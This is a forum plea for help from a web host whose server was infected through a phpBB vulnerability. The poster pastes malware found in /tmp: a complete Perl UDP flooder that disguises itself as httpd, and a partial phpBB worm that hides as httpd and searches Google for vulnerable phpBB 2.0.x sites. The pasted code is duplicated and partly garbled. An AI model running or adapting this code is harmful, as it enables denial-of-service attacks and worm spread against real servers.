phpBB exploited, worm received... Help
Luckly - I don't think the attack was targeted at anyone in particular - just a random attack from another machine; this doesn't change the fact that we were infected.
Last night we downloaded and ran an anti-virus, and it supposedly got rid of a lot of viruses (Although I think a good majority, if not all, were just e-mail attachments) - we also fixed the permissions; but the dependency table is still not working correctly, and we're not so sure the virus is completely gone (The last time we reset - it was put back into /tmp, and all permissions were reset).
So I'm here asking you all: What should we do? Whats a good anti-virus that detects phpBB worms and actually FIXES them, and the mess they cause?
My sysadmin says formatting is the best bet - but I'd really rather not do this... Neither of us have a very fast line, and we'd have to back up over 5gb of data - all the sites we host have to stay up, and any downtime at all is unacceptable.
jesus (in /tmp):
#!/usr/bin/perl
###
# Coffe, to all of you fed up of milk!
# coded by live, gr33tz to lucipher
use Socket;
if (@ARGV < 2) {
die "Coffe, Simple UDP flooder by live\n" .
"Usage: coffe <victim[:victim2:...:victimN]> <time_out> [port]\n";
}
$0 = "/usr/sbin/httpd";
@sin = map { inet_aton $_ } split /:/, $ARGV[0];
$t = time +$ARGV[1];
# nazis are comming!!
socket SS, PF_INET, SOCK_DGRAM, 17;
while (1) {
send SS, 0, 0, sockaddr_in($ARGV[2] || rand 65000, $sin[rand @sin]);
print "Done!\n" and exit if time >= $t;
}
###
# Coffe, to all of you fed up of milk!
# coded by live, gr33tz to lucipher
use Socket;
if (@ARGV < 2) {
die "Coffe, Simple UDP flooder by live\n" .
"Usage: coffe <victim[:victim2:...:victimN]> <time_out> [port]\n";
}
$0 = "/usr/sbin/httpd";
@sin = map { inet_aton $_ } split /:/, $ARGV[0];
$t = time +$ARGV[1];
# nazis are comming!!
socket SS, PF_INET, SOCK_DGRAM, 17;
while (1) {
send SS, 0, 0, sockaddr_in($ARGV[2] || rand 65000, $sin[rand @sin]);
print "Done!\n" and exit if time >= $t;
}
linuxday3 (In /tmp):
(Censored by me)
#############################################################
# Developed by br0k3d #
# For educational purpose only #
# Based ( almost ripped ) at ASW Worm! #
# Just made it fo study perl #
# 2nd Version - F***z Google #
# => br0k3d@gmail.com <= #
#############################################################
use strict;
use IO:
ocket;
use IO::Handle;
my $process = '/usr/sbin/httpd';
$0="$process"."\0"x16;;
my $pid=fork;
sub fetch();
sub remote($);
sub http_query($);
sub encode($);
sub fetch(){
my $rnd=(int(rand(9999)));
my $n= 50;
if ($rnd<5000) { $n<<=1;}
my $s= (int(rand(10)) * $n);
my @str=("viewtopic.php+%3Ft%3D+",
"viewtopic.php+%3Fp%3D+",
"powered+by+phpBB+2.0.6+viewtopic+",
"powered+by+phpBB+2.0.8+viewtopic+",
"powered+by+phpBB+2.0.4+viewtopic+"
);
my $query="www.google.com.br/search?q=";
$query.=$str[(rand(scalar(@str)))].$rnd;
$query.="&num=$n&start=$s";
my @lst=();
my $page = http_query($query);
while ($page =~ m/<a href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/google|cache|translate/){
push (@lst,$1);
}
}
return (@lst);
}
sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO:ocket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\nHost: $host\nAccept: */*\nUser-Agent: Mozilla/4.0\n\n ";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};
return $page;
}
sub encode($) {
my $s = shift;
$s =~ s/(.)/"chr(".ord($1).")%252E"/seg;
$s =~ s/%252E$//;
return $s;
}
eval {fork and exit;};
$|++;
open LOG,">> 57825";
autoflush LOG 1;
srand;
my $iam=$ARGV[0];
my $oneday=time+86400; # Antigamente era 1 semana mais o google ficou pau no cu ...
my $page="";
my @urls;
my $url;
# Developed by br0k3d #
# For educational purpose only #
# Based ( almost ripped ) at ASW Worm! #
# Just made it fo study perl
#
# 2nd Version - F***z Google #
# => br0k3d@gmail.com <= #
#############################################################
use strict;
use IO:
ocket;
use IO::Handle;
my $process = '/usr/sbin/httpd';
$0="$process"."\0"x16;;
my $pid=fork;
sub fetch();
sub remote($);
sub http_query($);
sub encode($);
sub fetch(){
my $rnd=(int(rand(9999)));
my $n= 50;
if ($rnd<5000) { $n<<=1;}
my $s= (int(rand(10)) * $n);
my @str=("viewtopic.php+%3Ft%3D+",
"viewtopic.php+%3Fp%3D+",
"powered+by+phpBB+2.0.6+viewtopic+",
"powered+by+phpBB+2.0.8+viewtopic+",
"powered+by+phpBB+2.0.4+viewtopic+"
);
my $query="www.google.com.br/search?q=";
$query.=$str[(rand(scalar(@str)))].$rnd;
$query.="&num=$n&start=$s";
my @lst=();
my $page = http_query($query);
while ($page =~ m/<a href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/google|cache|translate/){
push (@lst,$1);
}
}
return (@lst);
}
sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO:
ocket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\nHost: $host\nAccept: */*\nUser-Agent: Mozilla/4.0\n\n ";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};
return $page;
}
sub encode($) {
my $s = shift;
$s =~ s/(.)/"chr(".ord($1).")%252E"/seg;
$s =~ s/%252E$//;
return $s;
}
eval {fork and exit;};
$|++;
open LOG,">> 57825";
autoflush LOG 1;
srand;
my $iam=$ARGV[0];
my $oneday=time+86400; # Antigamente era 1 semana mais o google ficou pau no cu ...
my $page="";
my @urls;
my $url;
There was also a file called ".yougothacked" in /tmp... That may not be the exact file name, but its close.
